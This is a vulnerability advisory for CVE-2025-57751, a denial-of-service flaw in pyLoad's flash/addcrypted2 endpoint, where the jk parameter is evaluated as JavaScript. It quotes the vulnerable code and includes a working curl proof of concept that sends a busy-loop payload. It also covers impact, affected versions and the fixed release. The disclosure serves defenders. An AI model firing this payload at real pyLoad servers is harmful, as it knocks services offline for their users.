CVE-2025-57751: Denial-of-Service attack in pyLoad CNL Blueprint using dukpy.evaljs
Dear Maintainers, I am writing to you on behalf of the Tencent AI Sec. We have identified a potential vulnerability in one of your products and would like to report it to you for further investigation and mitigation.
Summary The jk parameter is received in pyLoad CNL Blueprint. Due to the lack of jk parameter verification, the jk parameter input by the user is directly determined as dykpy.evaljs(), resulting in the server CPU being fully occupied and the web-ui becoming unresponsive.
Details - Endpoint: flash/addcrypted2 - affected file: https://github.com/pyload/pyload/blob/develop/src/pyload/webui/app/blueprints/cnlblueprint.py#L123 https://github.com/pyload/pyload/blob/develop/src/pyload/core/utils/misc.py#L42
affected code python @bp.route("/flash/addcrypted2", methods=["POST"], endpoint="addcrypted2") @localcheck def addcrypted2(): package = flask.request.form.get( "package", flask.request.form.get("source", flask.request.form.get("referer")) ) crypted = flask.request.form["crypted"] jk = flask.request.form["jk"] packpassword = flask.request.form.get("passwords")
crypted = standardb64decode(unquote(crypted.replace(" ", "+"))) jk = evaljs(f"{jk} f()")
python def evaljs(script, es6=False): if sys.versioninfo < (3, 12): return (js2py.evaljs6 if es6 else js2py.evaljs)(script) else: return dukpy.evaljs(script)
PoC download pyload and run locally, send the following request - PoC shell curl -X POST "http://localhost:8000/flash/addcrypted2" \ -H "Content-Type: application/x-www-form-urlencoded" \ -d "crypted=SGVsbG8gd29ybGQ=" \ -d "passwords=pyload" \ -d "jk=const start = Date.now();%0Awhile (Date.now() - start < 30000) {} //" The 30000 can be modified to any large value.
Impact System resources are exhausted, causing services to be temporarily interrupted or stopped, making them inaccessible to normal users.
Use the following command to check CPU usage shell top -pid $(pgrep -f "pyload.main") or shell top -pid $(pgrep -f "pyload")
The CPU is fully occupied <img width="1209" height="134" alt="image" src="https://github.com/user-attachments/assets/5f9338fe-90c8-4e99-bd8e-a5b5c5a81a6e" />
web-ui unresponsive <img width="1209" height="496" alt="image" src="https://github.com/user-attachments/assets/7100cdb6-e4d5-4d0c-a138-51b08a7b1fbd" />
Other sources
pyLoad is the free and open-source Download Manager written in pure Python. The jk parameter is received in pyLoad CNL Blueprint. Due to the lack of jk parameter verification, the jk parameter input by the user is directly determined as dykpy.evaljs(), resulting in the server CPU being fully occupied and the web-ui becoming unresponsive. This vulnerability is fixed in 0.5.0b3.dev92.
— MITRE
Affected Software
Event History
Frequently Asked Questions
What is the severity of CVE-2025-57751?
CVE-2025-57751 has a high severity level due to its potential to cause significant resource exhaustion on affected systems.
How do I fix CVE-2025-57751?
To mitigate CVE-2025-57751, the recommendation is to update pyLoad to a version beyond 0.5.0b3.dev92 where the issue is patched.
What are the consequences of CVE-2025-57751?
Exploitation of CVE-2025-57751 can lead to server CPU exhaustion, which may impact the availability of services running on the affected server.
Which versions of pyLoad are affected by CVE-2025-57751?
CVE-2025-57751 affects all versions of pyLoad prior to 0.5.0b3.dev92.
Is CVE-2025-57751 remotely exploitable?
Yes, CVE-2025-57751 can be exploited remotely due to lack of input validation in the jk parameter.